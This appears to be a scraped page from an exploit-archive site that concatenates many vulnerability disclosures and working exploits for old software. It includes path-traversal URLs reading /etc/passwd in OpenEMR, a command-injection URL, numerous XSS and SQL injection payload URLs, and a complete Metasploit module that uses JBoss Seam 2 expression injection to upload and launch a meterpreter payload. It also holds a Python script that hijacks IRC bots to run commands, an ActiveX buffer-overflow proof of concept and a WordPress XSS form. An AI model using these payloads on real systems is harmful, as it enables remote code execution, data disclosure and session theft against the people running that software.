HireHackking

source: https://www.securityfocus.com/bid/51788/info OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible. OpenEMR 4.1.0 is vulnerable; other versions may also be affected. http://www.example.com/interface/patient_file/encounter/trend_form.php?formname=../../../etc/passwd%00

source: https://www.securityfocus.com/bid/51785/info Lead Capture is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/admin/login.php?message=[XSS]

source: https://www.securityfocus.com/bid/51788/info OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible. OpenEMR 4.1.0 is vulnerable; other versions may also be affected. http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00

source: https://www.securityfocus.com/bid/51788/info OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible. OpenEMR 4.1.0 is vulnerable; other versions may also be affected. http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00

source: https://www.securityfocus.com/bid/51794/info phpLDAPadmin is prone to cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpLDAPadmin 1.2.0.5-2 is affected; other versions may also be vulnerable. https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script> https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false

source: https://www.securityfocus.com/bid/51793/info phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable. http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub& filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search

# # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss Seam 2 File Upload and Execute', 'Description' => %q{ Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute a meterpreter payload. Versions of the JBoss AS admin-console are known to be vulnerable to this exploit, without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This module provides a more efficient method of exploitation - it does not loop to find desired Java classes and methods. NOTE: the check for upload success is not 100% accurate. NOTE 2: The module uploads the meterpreter JAR and a JSP to launch it. }, 'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ], 'References' => [ # JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs ['CVE', '2010-1871'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'], ['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'], ['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html'] ], 'DisclosureDate' => "Aug 05 2010", 'License' => MSF_LICENSE, 'Platform' => %w{ java }, 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ] ], 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8080), OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]), OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]), OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]), OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]), OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]), ], self.class) end def check vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) vprint_debug("Server sent a 302 with location") if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29)) report_vuln({ :host => rhost, :port => rport, :name => "#{self.name} - #{uri}", :refs => self.references, :info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource." }) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end # If we reach this point, we didn't find the service return Exploit::CheckCode::Unknown end def execute_cmd(cmd) cmd_to_run = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess)) vprint_status("#{rhost}:#{rport} Exploit successful") else vprint_status("#{rhost}:#{rport} Exploit failed.") end else vprint_status("#{rhost}:#{rport} Exploit failed.") end end def call_jsp(jspname) # TODO ugly way to strip off last resource on a path uri = target_uri.path *keep,ignore = uri.split(/\//) keep.push(jspname) uri = keep.join("/") uri = "/" + uri if (uri[0] != "/") res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "sessionid=" + Rex::Text.rand_text_alpha(32) }, timeout=datastore['TIMEOUT']) if (res and res.code == 200) vprint_status("Successful request to JSP") else vprint_error("Failed to request JSP") end end def upload_jsp(filename,jarname) jsp_text = <<EOJSP <%@ page import="java.io.*" %><%@ page import="java.net.*" %><% URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()}); Class c = cl.loadClass("metasploit.Payload"); c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]}); %> EOJSP vprint_status("Uploading JSP to launch payload") status = upload_file_chunk(filename,'false',jsp_text) if status vprint_status("JSP uploaded to to #{filename}") else vprint_error("Failed to upload file.") end @pl_sent = true end def upload_file_chunk(filename, append='false', chunk) # create URL-safe Base64-encoded version of chunk b64 = Rex::Text.encode_base64(chunk) b64 = b64.gsub("+","%2b") b64 = b64.gsub("/","%2f") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64 }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) # TODO Including the conversationId part in this regex might cause # failure on other Seam applications. Needs more testing if (res.headers['Location'] =~ %r(user=&conversationId)) #vprint_status("#{rhost}:#{rport} Exploit successful.") return true else #vprint_status("#{rhost}:#{rport} Exploit failed.") return false end else #vprint_status("#{rhost}:#{rport} Exploit failed.") return false end end def get_full_path(filename) #vprint_debug("Trying to find full path for #{filename}") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) # the user argument should be set to the result of our call - which # will be the full path of our file matches = /.*user=(.+)\&.*/.match(res.headers['Location']) #vprint_debug("Location is " + res.headers['Location']) if (matches and matches.captures) return Rex::Text::uri_decode(matches.captures[0]) else return nil end else return nil end end def java_stager(fname, chunk_size) @payload_exe = fname + ".jar" jsp_name = fname + ".jsp" #data = payload.encoded_jar.pack data = payload.encoded_jar.pack append = 'false' while (data.length > chunk_size) status = upload_file_chunk(@payload_exe, append, data[0, chunk_size]) if status vprint_debug("Uploaded chunk") else vprint_error("Failed to upload chunk") break end data = data[chunk_size, data.length - chunk_size] # first chunk is an overwrite, afterwards, we need to append append = 'true' end status = upload_file_chunk(@payload_exe, 'true', data) if status vprint_status("Payload uploaded to " + @payload_exe) else vprint_error("Failed to upload file.") end # write a JSP that can call the payload in the jar upload_jsp(jsp_name, @payload_exe) pe_path = get_full_path(@payload_exe) || @payload_exe jsp_path = get_full_path(jsp_name) || jsp_name # try to clean up our stuff; register_files_for_cleanup(pe_path, jsp_path) # call the JSP to launch the payload call_jsp(jsp_name) end def exploit @pl_sent = false if check == Exploit::CheckCode::Vulnerable fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8)) vprint_status("#{rhost}:#{rport} Host is vulnerable") vprint_status("#{rhost}:#{rport} Uploading file...") # chunking code based on struts_code_exec_exception_delegator append = 'false' chunk_size = datastore['CHUNKSIZE'] # sanity check if (chunk_size <= 0) vprint_error("Invalid chunk size #{chunk_size}") return end vprint_debug("Sending in chunks of #{chunk_size}") case target['Platform'] when 'java' java_stager(fname, chunk_size) else fail_with(Failure::NoTarget, 'Unsupported target platform!') end handler end end end

source: https://www.securityfocus.com/bid/51788/info OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible. OpenEMR 4.1.0 is vulnerable; other versions may also be affected. http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123

# thehunter.py # Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution # Author: Jay Turla ( @shipcod3 ) # Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def usage(): print("USAGE: python thehunter.py nick \n") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot server = "us.dal.net" #irc server channel = "#buhaypirata" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 6667)) #connects to the server irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv)

source: https://www.securityfocus.com/bid/51802/info The 'com_bnf' component for Joomla! is prone to a remote SQL injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL Injection]&direccion=&direct=0&Itemid=0&lang=es

source: https://www.securityfocus.com/bid/51799/info GForge is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. http://www.example.com/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.example.com/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

source: https://www.securityfocus.com/bid/51803/info iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search

source: https://www.securityfocus.com/bid/51842/info project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/register/account-closed?message=[arbitrary-JavaScript]

source: https://www.securityfocus.com/bid/51804/info The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]

source: https://www.securityfocus.com/bid/51866/info Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions. Edraw Diagram Component 5 is vulnerable; other versions may also be affected. Author : Senator of Pirates This exploit tested on Windows Xp SP3 EN http://www.edrawsoft.com/download/EDBoardSetup.exe -------------------------------------------------------------------------------------------------------- <object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx" prototype = "Invoke_Unknown LicenseName As String" memberName = "LicenseName" progid = "EDBoardLib.EDBoard" argCount = 1 arg1=String(3092, "A") target.LicenseName = arg1</script>

source: https://www.securityfocus.com/bid/51865/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/weblinks.php?weblink_id=[Sql]

source: https://www.securityfocus.com/bid/51878/info Vespa is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks. Vespa 0.8.6 is vulnerable; other versions may also be affected. http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00

source: https://www.securityfocus.com/bid/51869/info Apache HTTP Server is prone to a security-bypass vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications. RewriteRule ^(.*) http://www.example.com$1 ProxyPassMatch ^(.*) http://www.example.com$1

source: https://www.securityfocus.com/bid/51882/info Simple Groupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Simple Groupware 0.742 is vulnerable; other versions may also be affected. http://www.example.com/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert(&#039;xss&#039;)</ScRiPt>

source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected. #1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert(&#039;zsl&#039;)</script> HTTP/1.1

source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected. #2 - POST http://www.example.com/DomainConfig.do?methodToCall=save HTTP/1.1 - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert(&#039;zsl&#039;)</script>&reset=

source: https://www.securityfocus.com/bid/51918/info D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities. Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. The following products are affected: D-Link DNS-320 ShareCenter D-Link DNS-325 ShareCenter http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls http://www.example.com/cgi-bin/discovery.cgi http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml

source: https://www.securityfocus.com/bid/51917/info Apache APR is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36669.zip

source: https://www.securityfocus.com/bid/51894/info eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. eFront 3.6.10 is vulnerable; other versions may also be affected. http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable& limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C

# Exploit Title: Shareaholic 7.6.0.3 XSS # Date: 10-11-2014 # Software Link: https://wordpress.org/plugins/shareaholic/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9311 # Category: webapps 1. Description ShareaholicAdmin::add_location is accessible for every registered user. File: shareaholic\shareaholic.php add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location')); $_POST['location'] is not escaped. File: shareaholic\admin.php public static function add_location() { $location = $_POST['location']; $app_name = $location['app_name']; ShareaholicUtilities::update_options(array( 'location_name_ids' => array( $app_name => array( $location['name'] => $location['id'] ), ), $app_name => array( $location['name'] => 'on' ) )); echo json_encode(array( 'status' => "successfully created a new {$location['app_name']} location", 'id' => $location['id'] )); die(); } http://security.szurek.pl/shareaholic-7603-xss.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="shareaholic_add_location"> <input type="hidden" name="location[app_name]" value="recommendations"> <input type="hidden" name="location[name]" value="post_below_content"> XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>"> <input type="submit" value="Hack!"> </form> XSS will be visible for admin: http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings 3. Solution: Update to version 7.6.1.0 https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/